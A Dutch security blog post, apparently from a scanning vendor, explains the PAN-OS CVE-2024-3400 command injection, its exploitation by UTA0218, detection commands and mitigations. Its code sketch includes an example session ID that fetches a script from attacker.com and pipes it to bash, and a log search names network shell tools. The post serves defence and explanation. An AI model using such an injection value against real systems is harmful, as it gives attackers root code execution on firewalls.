剣 KENSAI

CVE-2024-3400: Palo Alto PAN-OS Command Injection — CVSS 10.0

januari 2026 9 min leestijd beveiliging

Kort samengevat: CVE-2024-3400 is een OS command injection-kwetsbaarheid met maximale ernst in de GlobalProtect-gateway van Palo Alto Networks PAN-OS. Een niet-geauthenticeerde aanvaller kan willekeurige OS-commando's als root uitvoeren, zonder enige interactie vereist. Geëxploiteerd door UTA0218 (vermoedelijk statelijk gesponsord) vóór openbaarmaking.

KenmerkWaarde
CVE IDCVE-2024-3400
CVSS-vectorAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-77: OS Command Injection
Gepubliceerd12 april 2024
ExploitatieActief — CISA KEV, exploitatie door natiestaat

CVSS 10.0 — KRITIEK (MAX)

Wat is CVE-2024-3400?

CVE-2024-3400 treft de GlobalProtect-functie van Palo Alto Networks PAN-OS. Wanneer GlobalProtect is geconfigureerd als gateway of portal, kan een niet-geauthenticeerde externe aanvaller willekeurige OS-commando's injecteren die met rootrechten worden uitgevoerd op de firewall-appliance.

De combinatie van factoren — geen authenticatie vereist, netwerktoegankelijk, gewijzigde scope, maximale impact op vertrouwelijkheid, integriteit en beschikbaarheid — levert een perfecte CVSS-score van 10.0 op. Onder firewallleveranciers hebben slechts een handvol kwetsbaarheden ooit deze score gekregen.

🚨 Exploitatie door natiestaat vóór beschikbaarheid van de patch

Volexity ontdekte deze kwetsbaarheid tijdens de respons op een incident waarbij UTA0218, een geavanceerde dreigingsactor, een nieuwe Python-backdoor genaamd UPSTYLE had geïnstalleerd op gecompromitteerde PAN-OS-apparaten. De aanvaller gebruikte de firewall als pivotpunt om interne netwerken te bereiken, Active Directory-credentials te stelen en gevoelige data te exfiltreren. Volexity schat dat de exploitatie eind maart 2024 begon — weken voordat Palo Alto werd geïnformeerd.

Getroffen systemen

PAN-OS-versieGetroffen (GlobalProtect ingeschakeld)Gerepareerde versie
PAN-OS 11.1< 11.1.2-h311.1.2-h3+
PAN-OS 11.0< 11.0.4-h111.0.4-h1+
PAN-OS 10.2< 10.2.9-h110.2.9-h1+
PAN-OS 10.1< 10.1.14-h410.1.14-h4+

Vereiste: GlobalProtect-gateway of -portal moet geconfigureerd zijn (show global-protect-gateway current-user geeft resultaten terug). Organisaties die GlobalProtect niet hebben geconfigureerd, zijn niet getroffen.

Technische analyse

Het injectiepunt bevindt zich in de code voor sessieafhandeling van GlobalProtect. Wanneer een GlobalProtect-sessie tot stand komt, worden bepaalde sessiekenmerken naar tijdelijke bestanden op de firewall geschreven. De code die het bestandspad voor deze sessiebestanden opbouwt, saneert de sessie-identifier — die gedeeltelijk door de aanvaller gecontroleerd wordt — niet correct.

# Simplified vulnerable file path construction
SESSION_ID = request.cookie["SESSID"]  # Attacker-controlled
session_file = f"/var/appweb/sslvpndocs/global-protect/{SESSION_ID}.log"
os.system(f"echo 'connected' >> {session_file}")  # Command injection here

# Attacker crafts session ID containing shell metacharacters:
# SESSION_ID = "../../tmp/evil;curl http://attacker.com/shell.sh|bash;"

De door UTA0218 geïnstalleerde UPSTYLE-backdoor gebruikte een nieuw persistentiemechanisme: een Python-script dat de toegangslogs van de webserver monitorde op specifieke verzoekpatronen (met een versleuteld commando), de commando's uitvoerde, en vervolgens de oorspronkelijke bestandsinhoud herstelde om bewijs van de activiteit te verwijderen.

Post-exploitatieactiviteit (UTA0218)

Volexity documenteerde de volgende post-exploitatiesequentie van statelijke actoren:

Detectie

Analyse van PAN-OS-logs

# Check for UPSTYLE backdoor artifacts
find / -name "*.py" -newer /etc/passwd -not -path "*/site-packages/*" 2>/dev/null

# Suspicious traffic in GlobalProtect logs
grep -i "curl\|wget\|python\|bash" /var/log/pan/sslvpn.log

# Modified system files (UPSTYLE modifies then restores)
# Check for recent access times on web server files
find /var/appweb -atime -7 -name "*.php" -o -name "*.py"

Threat hunting-query's

Mitigatie

  1. Patch onmiddellijk: pas de hierboven vermelde hotfix-versies toe. Dit is een CVSS 10.0 met actieve exploitatie — er is geen aanvaardbare vertraging.
  2. Tijdelijke workaround via Threat Prevention: voor ongepatchte apparaten, schakel Threat Prevention in met beveiligingsprofielen op GlobalProtect-interfaces. Palo Alto leverde specifieke threat ID-signaturen.
  3. Schakel GlobalProtect uit indien niet nodig: organisaties die GlobalProtect niet actief gebruiken, kunnen de functie tijdelijk uitschakelen als workaround.
  4. Audit firewallbestanden: voer het door Palo Alto geleverde script uit om te controleren op UPSTYLE en andere post-exploitatie-artefacten.
  5. Roteer alle credentials: alle credentials opgeslagen in de firewallconfiguratie (VPN-certificaten, LDAP-bind-credentials, enz.) moeten als gecompromitteerd worden beschouwd.

💡 CISA-noodrichtlijn: CISA vaardigde Emergency Directive 24-03 uit, die alle Amerikaanse federale overheidsinstanties verplichtte om vóór 19 april 2024 patches of mitigaties toe te passen. De urgentie weerspiegelt de ernst en actieve exploitatie door geavanceerde dreigingsactoren.

KENSAI-detectiemogelijkheden

Is uw Palo Alto-infrastructuur blootgesteld aan CVE-2024-3400?

KENSAI identificeert direct aan internet blootgestelde PAN-OS-apparaten die kwetsbaar zijn voor command injection. Wacht niet tot dreigingsactoren ze eerder vinden.

Scan nu uw perimeter